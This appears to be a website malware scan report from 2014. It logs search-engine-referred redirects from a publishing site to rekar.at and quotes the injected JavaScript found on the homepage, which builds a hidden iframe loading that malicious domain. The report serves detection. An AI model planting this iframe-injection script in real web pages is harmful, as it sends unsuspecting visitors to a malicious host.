Malicious/Suspicious Redirects
Request:
    URL: http://stempjohnsonpublishing.com/ (imitation of visitor from search engine)
    GET / HTTP/1.1
    Host: stempjohnsonpublishing.com
    Referer: http://www.google.com/search?q=redirect+check1
Server response:
    HTTP/1.1 301 Moved Permanently
    Connection: close
    Date: Sun, 28 Sep 2014 17:45:39 GMT
    Location: http://rekar.at/clk.php
    Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
    Content-Length: 374
    Content-Type: text/html; charset=iso-8859-1
Status: malicious

Request:
    URL: http://rekar.at/clk.php (imitation of visitor from search engine)
    GET /clk.php HTTP/1.1
    Host: rekar.at
    Referer: http://www.google.com/search?q=redirect+check2
Server response:
    HTTP/1.1 302 Found
    Connection: close
    Date: Sun, 28 Sep 2014 17:45:38 GMT
    Location: http://localhost/
    Server: Apache/2.0.52 (CentOS)
    Content-Length: 0
    Content-Type: text/html
    X-Powered-By: PHP/5.2.4
    X-Powered-By: PleskLin
Status: malicious

Scanned pages/files
Request | Server response | Status |
http://stempjohnsonpublishing.com/ | 200 OK Content-Length: 4829 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rekar.at
    (function () {
        var id = '329';
        var nrpv09 = document.createElement('iframe');
        nrpv09.src = 'http://rekar.at/clk.php';
        nrpv09.style.position = 'absolute';
        nrpv09.style.border = '1';
        nrpv09.style.height = '31px';
        nrpv09.style.width = '42px';
        nrpv09.style.left = '500px';
        nrpv09.style.top = '100px';
        if (!document.getElementById('nrpv')) {
            document.write('<style>body{overflow-x:hidden;}</style>');
            document.write('<div id=\'nrpv\' style="position:absolute; width:80%; height:100%;" ></div>');
            document.getElementById('nrpv').appendChild(nrpv09);
        }
    })();
http://stempjohnsonpublishing.com/test404page.js | 500 Internal Server Error Content-Length: 845 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stempjohnsonpublishing.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://stempjohnsonpublishing.com/
Result: stempjohnsonpublishing.com is not infected or malware details are not published yet.